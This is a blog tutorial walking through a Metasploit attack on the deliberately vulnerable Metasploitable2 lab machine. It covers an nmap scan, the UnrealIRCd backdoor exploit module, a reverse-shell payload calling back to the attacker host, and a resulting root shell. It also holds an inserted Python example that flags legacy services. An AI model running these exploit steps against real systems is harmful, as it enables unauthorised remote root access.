METASPLOIT/METASPLOITABLE2

March 14, 2016 | Views: 4679


The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools.

After the virtual machine boots, log in to the console with username msfadmin and password msfadmin. From the shell, run the ifconfig command to identify the IP address.

To get an IP address on your LAN, you must configure the VM's network adapter in bridged mode.

eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1

inet addr:192.168.1.4 Bcast:192.168.1.255 Mask:255.255.255.0

So in my case the IP address of the target is 192.168.1.4.

From our attack system (Linux, preferably something like Kali Linux), we will identify the open network services on this virtual machine using the Nmap Security Scanner.

Let's get to it:

To open Metasploit, run the command:

msfconsole

I receive the following:

cowsay++
____________

————
,__,
(oo)____
(__) )
||–|| *

=[ metasploit v4.11.15-dev-8697798 ]
+ -- --=[ 1523 exploits - 887 auxiliary - 260 post ]
+ -- --=[ 436 payloads - 38 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

Whenever you start up Metasploit, there is a cute little banner, which is sometimes an animal saying "metasploit" or some asteroids-based ASCII art. Regardless of what you see there, the important stuff is below it: Metasploit prints its version, including the core and API version, how many exploit, auxiliary and post modules it has loaded, and how many payloads, encoders and nops it has.

From here we can start to enter commands.

Let's look at help:

msf > help

Core Commands
=============

Command Description
——- ———–
? Help menu
advanced Displays advanced options for one or more modules
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
edit Edit the current module with $VISUAL or $EDITOR
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
info Displays information about one or more modules
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
rename_job Rename a job
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers

Database Backend Commands
=========================

Command Description
——- ———–
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces

So we can now see all options available to us. A shortcut for "help" is also a question mark ("?").
The help command is a good reference in case you are stuck on a certain menu, or just want to learn more features of the msfconsole.
To start off a pentest, we need to find the machines on the network.
Finding all machines and attack vectors is known as "intelligence gathering" or "enumeration".
To find all targets on our network, we would just run an nmap scan against our subnet.
There are many different options for nmap, including host OS discovery, stealthy scans, traceroute, and many others.

Okay, now let's finally start exploiting this machine.
As previously stated, we need to run host enumeration against this machine to see what type of services it has running and which ports are open. Inside of msfconsole we can use the built-in database to save our nmap scans.
Run this command to ensure that our database is connected:

msf > db_status
[*] postgresql connected to metasploit4
msf > db_nmap
[*] Usage: db_nmap [--save | [--help | -h]] [nmap options]
msf >

If it spits out an error, then we need to connect our database.

Now type:

db_nmap -v -sS -A [ip-address]

-v is "verbose", which means it will output more information to the screen for us.
-sS is the "SYN" or "stealth" scan, which doesn't complete a full TCP connection to the host and is thus "stealthy". If you want to know more about this, check out the nmap man page or other documentation.
-A is an all-encompassing option which includes operating system detection, version detection (like the -sV option), script scanning, and traceroute.

msf > db_nmap -v -sS -A 192.168.1.4
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-11 20:20 CET
[*] Nmap: NSE: Loaded 132 scripts for scanning.
[*] Nmap: NSE: Script Pre-scanning.
[*] Nmap: Initiating NSE at 20:20
[*] Nmap: Completed NSE at 20:20, 0.00s elapsed
[*] Nmap: Initiating NSE at 20:20
[*] Nmap: Completed NSE at 20:20, 0.03s elapsed
[*] Nmap: Initiating ARP Ping Scan at 20:20
[*] Nmap: Scanning 192.168.1.4 [1 port]
[*] Nmap: Completed ARP Ping Scan at 20:20, 0.23s elapsed (1 total hosts)
[*] Nmap: Initiating Parallel DNS resolution of 1 host. at 20:20
[*] Nmap: Completed Parallel DNS resolution of 1 host. at 20:20, 0.03s elapsed
[*] Nmap: Initiating SYN Stealth Scan at 20:20
[*] Nmap: Scanning 192.168.1.4 [1000 ports]
[*] Nmap: Discovered open port 53/tcp on 192.168.1.4
[*] Nmap: Discovered open port 3306/tcp on 192.168.1.4
[*] Nmap: Discovered open port 25/tcp on 192.168.1.4
[*] Nmap: Discovered open port 21/tcp on 192.168.1.4
[*] Nmap: Discovered open port 22/tcp on 192.168.1.4
[*] Nmap: Discovered open port 139/tcp on 192.168.1.4
[*] Nmap: Discovered open port 23/tcp on 192.168.1.4
[*] Nmap: Discovered open port 111/tcp on 192.168.1.4
[*] Nmap: Discovered open port 80/tcp on 192.168.1.4
[*] Nmap: Discovered open port 445/tcp on 192.168.1.4
[*] Nmap: Discovered open port 5900/tcp on 192.168.1.4
[*] Nmap: Discovered open port 1099/tcp on 192.168.1.4
[*] Nmap: Discovered open port 2121/tcp on 192.168.1.4
[*] Nmap: Discovered open port 513/tcp on 192.168.1.4
[*] Nmap: Discovered open port 514/tcp on 192.168.1.4
[*] Nmap: Discovered open port 512/tcp on 192.168.1.4
[*] Nmap: Discovered open port 6000/tcp on 192.168.1.4
[*] Nmap: Discovered open port 8009/tcp on 192.168.1.4
[*] Nmap: Discovered open port 6667/tcp on 192.168.1.4
[*] Nmap: Discovered open port 2049/tcp on 192.168.1.4
[*] Nmap: Discovered open port 8180/tcp on 192.168.1.4
[*] Nmap: Discovered open port 1524/tcp on 192.168.1.4
[*] Nmap: Discovered open port 5432/tcp on 192.168.1.4
[*] Nmap: Completed SYN Stealth Scan at 20:20, 2.85s elapsed (1000 total ports)
[*] Nmap: Initiating Service scan at 20:20
[*] Nmap: Scanning 23 services on 192.168.1.4
[*] Nmap: Completed Service scan at 20:23, 136.29s elapsed (23 services on 1 host)
[*] Nmap: Initiating OS detection (try #1) against 192.168.1.4
[*] Nmap: NSE: Script scanning 192.168.1.4.
[*] Nmap: Initiating NSE at 20:23
[*] Nmap: Completed NSE at 20:26, 158.57s elapsed
[*] Nmap: Initiating NSE at 20:26
[*] Nmap: Completed NSE at 20:26, 0.16s elapsed
[*] Nmap: Nmap scan report for 192.168.1.4
[*] Nmap: Host is up (0.047s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
[*] Nmap: |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
[*] Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
[*] Nmap: | Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
[*] Nmap: | Public Key type: rsa
[*] Nmap: | Public Key bits: 1024
[*] Nmap: | Signature Algorithm: sha1WithRSAEncryption
[*] Nmap: | Not valid before: 2010-03-17T14:07:45
[*] Nmap: | Not valid after: 2010-04-16T14:07:45
[*] Nmap: | MD5: dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
[*] Nmap: |_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
[*] Nmap: |_ssl-date: 2016-03-11T19:23:22+00:00; -46s from scanner time.
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: | dns-nsid:
[*] Nmap: |_ bind.version: 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 (DAV/2)
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)
[*] Nmap: | rpcinfo:
[*] Nmap: | program version port/proto service
[*] Nmap: | 100000 2 111/tcp rpcbind
[*] Nmap: | 100000 2 111/udp rpcbind
[*] Nmap: | 100003 2,3,4 2049/tcp nfs
[*] Nmap: | 100003 2,3,4 2049/udp nfs
[*] Nmap: | 100005 1,2,3 35875/udp mountd
[*] Nmap: | 100005 1,2,3 44512/tcp mountd
[*] Nmap: | 100021 1,3,4 50723/tcp nlockmgr
[*] Nmap: | 100021 1,3,4 54154/udp nlockmgr
[*] Nmap: | 100024 1 35197/udp status
[*] Nmap: |_ 100024 1 47457/tcp status
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp open exec netkit-rsh rexecd
[*] Nmap: 513/tcp open login
[*] Nmap: 514/tcp open tcpwrapped
[*] Nmap: 1099/tcp open rmiregistry GNU Classpath grmiregistry
[*] Nmap: |_rmi-dumpregistry: Registry listing failed (No return data received from server)
[*] Nmap: 1524/tcp open shell Metasploitable root shell
[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003)
[*] Nmap: 2121/tcp open ccproxy-ftp?
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
[*] Nmap: | mysql-info:
[*] Nmap: | Protocol: 53
[*] Nmap: | Version: .0.51a-3ubuntu5
[*] Nmap: | Thread ID: 8
[*] Nmap: | Capabilities flags: 43564
[*] Nmap: | Some Capabilities: SupportsCompression, SwitchToSSLAfterHandshake, LongColumnFlag, Support41Auth, ConnectWithDatabase, Speaks41ProtocolNew, SupportsTransactions
[*] Nmap: | Status: Autocommit
[*] Nmap: |_ Salt: -6g${cZ|!+TFBVm?1x*c
[*] Nmap: 5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7
[*] Nmap: 5900/tcp open vnc VNC (protocol 3.3)
[*] Nmap: | vnc-info:
[*] Nmap: | Protocol version: 3.3
[*] Nmap: | Security types:
[*] Nmap: |_ Unknown security type (33554432)
[*] Nmap: 6000/tcp open X11 (access denied)
[*] Nmap: 6667/tcp open irc Unreal ircd
[*] Nmap: 8009/tcp open ajp13?
[*] Nmap: 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
[*] Nmap: MAC Address: 08:00:27:02:3B:8E (Oracle VirtualBox virtual NIC)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.9 – 2.6.33
[*] Nmap: Uptime guess: 0.011 days (since Fri Mar 11 20:10:28 2016)
[*] Nmap: Network Distance: 1 hop
[*] Nmap: TCP Sequence Prediction: Difficulty=204 (Good luck!)
[*] Nmap: IP ID Sequence Generation: All zeros
[*] Nmap: Service Info: Hosts: metasploitable.localdomain, metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Host script results:
[*] Nmap: | nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: , NetBIOS MAC: (unknown)
[*] Nmap: | Names:
[*] Nmap: | METASPLOITABLE Flags:
[*] Nmap: | METASPLOITABLE Flags:
[*] Nmap: | METASPLOITABLE Flags:
[*] Nmap: | \x01\x02__MSBROWSE__\x02 Flags:
[*] Nmap: | WORKGROUP Flags:
[*] Nmap: | WORKGROUP Flags:
[*] Nmap: |_ WORKGROUP Flags:
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 47.36 ms 192.168.1.4
[*] Nmap: NSE: Script Post-scanning.
[*] Nmap: Initiating NSE at 20:26
[*] Nmap: Completed NSE at 20:26, 0.03s elapsed
[*] Nmap: Initiating NSE at 20:26
[*] Nmap: Completed NSE at 20:26, 0.00s elapsed
[*] Nmap: Read data files from: /usr/bin/../share/nmap
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 326.93 seconds
[*] Nmap: Raw packets sent: 1104 (49.322KB) | Rcvd: 1102 (44.930KB)
msf >

Once you run this, a whole lotta stuff should come out at you. Once the scan is done you might be confused with your results, but I’ll show you how to easily determine your attack vector.

When your database has hosts in it, you can display which ones it has tracked with the “hosts” command.
Mine looks like this right now:

msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
192.168.1.1 64:6e:ea:16:de:98 Linux 2.6.X server
192.168.1.2 Linux 3.X server
192.168.1.4 08:00:27:02:3b:8e Linux 2.6.X server

Pretty cool, right? It has the IP, OS, flavor of OS, MAC, and more!
If we were to run a larger nmap scan, there would be many more hosts listed. This is a great way to keep track of which hosts are which while conducting a pentest.

But how does this help us with our exploitation? Metasploit also has the option to display all services detected by typing “services”. This is my output after scanning the Metasploitable host:

msf > services

Services
========

host port proto name state info
—- —- —– —- —– —
192.168.1.4 2121 tcp ccproxy-ftp open ProFTPD 1.3.1
192.168.1.4 25 tcp smtp open Postfix smtpd
192.168.1.4 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.4 53 tcp domain open ISC BIND 9.4.2
192.168.1.4 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5
192.168.1.4 6667 tcp irc open Unreal ircd
192.168.1.4 23 tcp telnet open Linux telnetd
192.168.1.4 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1
192.168.1.4 5432 tcp postgresql open PostgreSQL DB 8.3.0 – 8.3.7
192.168.1.4 2049 tcp nfs open 2-4 RPC #100003
192.168.1.4 1524 tcp shell open Metasploitable root shell
192.168.1.4 1099 tcp rmiregistry open GNU Classpath grmiregistry
192.168.1.4 514 tcp tcpwrapped open
192.168.1.4 8009 tcp ajp13 open Apache Jserv Protocol v1.3
192.168.1.4 111 tcp rpcbind open 2 RPC #100000
192.168.1.4 513 tcp login open
192.168.1.4 512 tcp exec open netkit-rsh rexecd
192.168.1.4 445 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP
192.168.1.4 5900 tcp vnc open VNC protocol 3.3
192.168.1.4 21 tcp ftp open vsftpd 2.3.4
192.168.1.4 6000 tcp x11 open access denied
192.168.1.4 139 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP

Well, that is quite a bit more useful. We can see the IP of the host together with the port, protocol, and service in use. On top of that, since we had version detection on, it displays more information about which version of the service is running.
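To show what the "services" table above is built from, here is an added example (not code from the original post or from Metasploit) that parses the port lines of db_nmap console output into a services inventory and flags the service types a defender would want to see retired, such as the cleartext and host-trust protocols that appear in this scan. The scan lines embedded in it are constructed to mirror the shape of the output above, the Service record and the legacy-protocol mapping are this example's own, and nothing here talks to the network.

```python
"""Parse db_nmap console output into a services inventory and flag legacy
cleartext or trust-based services.  Added example, not part of the original
post or of Metasploit; the sample lines are constructed from the shape of the
scan output shown in the post."""
import re
from typing import Dict, List, NamedTuple

# Constructed sample of db_nmap output (same line shape as the real scan above).
SAMPLE_SCAN = """\
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 512/tcp open exec netkit-rsh rexecd
[*] Nmap: 513/tcp open login
[*] Nmap: 514/tcp open tcpwrapped
[*] Nmap: 2121/tcp open ccproxy-ftp?
[*] Nmap: 5900/tcp open vnc VNC (protocol 3.3)
[*] Nmap: 6667/tcp open irc Unreal ircd
[*] Nmap: MAC Address: 08:00:27:02:3B:8E (Oracle VirtualBox virtual NIC)
"""


class Service(NamedTuple):
    port: int
    proto: str
    state: str
    name: str      # nmap service name with any trailing '?' removed
    info: str      # version banner; empty when nmap printed none
    guessed: bool  # True when nmap marked the service name with '?'


# Only lines of the form "[*] Nmap: <port>/<proto> <state> <service> [<version>]"
# are port rows; banner, NSE detail ('|') and host lines are skipped.
PORT_LINE = re.compile(
    r"^\[\*\] Nmap: (?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)"
    r"\s+(?P<name>\S+)(?:\s+(?P<info>.*))?$"
)

# Service families a defender wants off the network; this mapping is the
# example's own judgement, not something nmap or Metasploit emits.
LEGACY_REASONS: Dict[str, str] = {
    "ftp": "cleartext credentials",
    "telnet": "cleartext credentials and session",
    "login": "rlogin: cleartext and host-trust based",
    "exec": "rexec: cleartext credentials",
    "shell": "rsh-style remote shell: host-trust based",
    "vnc": "VNC 3.3: weak challenge auth, no transport encryption",
}


def parse_scan(text: str) -> List[Service]:
    """Extract one Service per port row of db_nmap output."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        name = m.group("name")
        services.append(Service(
            int(m.group("port")), m.group("proto"), m.group("state"),
            name.rstrip("?"), (m.group("info") or "").strip(), name.endswith("?")))
    return services


def flag_legacy(services: List[Service]) -> Dict[int, str]:
    """Map each open legacy-protocol port to the reason it is flagged."""
    return {s.port: LEGACY_REASONS[s.name]
            for s in services if s.state == "open" and s.name in LEGACY_REASONS}


def services_table(services: List[Service]) -> str:
    """Render a table in the spirit of the msfconsole 'services' command."""
    rows = ["port  proto  name          state  info",
            "----  -----  ----          -----  ----"]
    for s in sorted(services, key=lambda s: s.port):
        rows.append(f"{s.port:<5} {s.proto:<6} {s.name:<13} {s.state:<6} {s.info}")
    return "\n".join(rows)


if __name__ == "__main__":
    svcs = parse_scan(SAMPLE_SCAN)
    print(services_table(svcs))
    for port, why in sorted(flag_legacy(svcs).items()):
        print(f"[!] {port}/tcp: {why}")
```

Feeding the full scan output from the post into parse_scan gives the same rows as the "services" command; the flagged list is the part a host owner should act on regardless of whether any single exploit works.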

We can see port 6667 is running Unreal ircd. Unreal is a server for IRC (Internet Relay Chat), and the "d" at the end of ircd stands for "daemon", a background process that listens on the port for incoming connections.

Metasploit also has an awesome feature to find exploits, scanners, and other modules: the "search" command. We are going to run the following command to see if there are any modules for Unreal IRC:

msf > search unreal

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/linux/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 “secure” Overflow (Linux)
exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent UnrealIRCD 3.2.8.1 Backdoor Command Execution
exploit/windows/games/ut2004_secure 2004-06-18 good Unreal Tournament 2004 “secure” Overflow (Win32)

To load a module in Metasploit, we use the “use” command followed by the name of the module:

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) >

As we can see, our prompt has changed to show that we are using an exploit module, together with its name. With the "use" command you can use tab completion, which means that if you're stuck, hitting the tab key will either complete the module name or, if pressed twice, display the possible completions (if there are multiple). Most Linux users know this since it is incredibly useful while moving through a file system or issuing commands quickly.

Now that we have the module loaded, issuing the command “show options” will of course show us the possible options.

msf exploit(unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 6667 yes The target port

Exploit target:

Id Name
— —-
0 Automatic Target

There are only two options, and only one target, which is automatic since this module is for a single operating system. Both options are required, which means the exploit cannot be run without them. We can see the port is already set, since IRC servers normally run on port 6667, but if someone is hiding the service on a different port, this can be changed.
To set or change an option, issue the "set" command followed by the option you wish to change and finally the value you want to give it, as follows:

msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.4
RHOST => 192.168.1.4

Of course you would want to set your host IP to whatever the IP address is of your exploitable machine.

Metasploit has "payloads" that determine what kind of code we want to execute once the exploit has connected to the host machine. You can list the payloads compatible with the loaded module with "show payloads", or use the "search" command followed by what you are looking for (e.g. unix shell).

msf exploit(unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
—- ————— —- ———–
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)

msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.4
RHOST => 192.168.1.4
msf exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/reverse_ruby_ssl
PAYLOAD => cmd/unix/reverse_ruby_ssl

Let’s finally exploit this system! The exploit command has certain options such as -j which runs it as a job, or -z which does not interact with the system after exploitation. These can be used in different ways. To view all of them, use the help command followed by what command you need help with (e.g. help exploit).
Running our exploit results in this:

msf exploit(unreal_ircd_3281_backdoor) > exploit -z

[*] Started reverse SSL handler on 192.168.1.2:4444
[*] 192.168.1.4:6667 – Connected to 192.168.1.4:6667…
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
[*] 192.168.1.4:6667 – Sending backdoor command…
[*] Exploit completed, but no session was created.

And in the end it does not work :( but what can you do... maybe I'll try a different exploit or payload :)
The output I was hoping for would look like this:

msf exploit(unreal_ircd_3281_backdoor) > exploit -z
[*] Started bind handler
[*] Connected to 192.168.1.10:6667…
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
[*] Sending backdoor command…
[*] Command shell session 3 opened (192.168.1.111:51923 -> 192.168.1.110:4444) at 2012-11-04 22:30:09 -0500
[*] Session x created in the background.

We see some output, and most notably at the bottom "command shell session opened" and "session created in the background". If we had run this without the -z option and without setting a payload, the following output would have been produced:

msf exploit(unreal_ircd_3281_backdoor) > exploit
[*] Started reverse double handler
[*] Connected to 192.168.1.110:6667…
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
[*] Sending backdoor command…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo aeuPuvLl90yRmhts;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: "aeuPuvLl90yRmhts\r\n"
[*] Matching…
[*] A is input…
[*] Command shell session x opened (192.168.1.111:4444 -> 192.168.1.110:49034) at 2012-11-03 23:08:41 -0400

That's a lot of stuff, but it's pretty easy to understand. First it connects to the socket (an IP and port) and receives back the two NOTICE lines. After it receives those, it sends the backdoor command and accepts two connections. Part of the exploit is echoing a random string, which is then written to both sockets. Those sockets are then read, and what is received is printed and matched against the string so the handler knows which socket is input and which is output. After the backdoor goes through, a command shell is opened and labeled with a session number.

Coming back to the previous exploit, what we should have is a blank screen. Let's get back to what you should have done previously, since this is just another option in our exploiting phase. Keep in mind that when issuing exploits there are numerous ways to get where you need to be, and certain options are better than others.

Now, we have session x created in the background, how do we access it? Of course Metasploit has an awesome command for this, which is “sessions”:

msf exploit(unreal_ircd_3281_backdoor) > sessions
Active sessions
===============
Id Type Information Connection
— —- ———– ———-
x shell unix 192.168.1.111:51923 -> 192.168.1.110:4444 (192.168.1.110)

Of course the IP addresses will be different from yours since we do not have the exact same network, but it should display your exploited system's IP address. The Id will be the number of the session you created, and depends on how many sessions you have created.

Finally how we interact with this session is to issue the following command:

msf exploit(unreal_ircd_3281_backdoor) > sessions -i x
[*] Starting interaction with x…
pwd
/etc/unreal
whoami
root
id
uid=0(root) gid=0(root)

So, as we can see, interacting with session x brings us to a command prompt on the exploited machine. Running pwd displays our current working directory, whoami displays which user we have access as, and id displays our uid and gid.

So thank you for reading my first post on Cybrary 0P3N.

2 Comments
  1. Thank you so much!

  2. This text was originally written by the old blog from the time when it was hard to get good material for learning, respect for old school
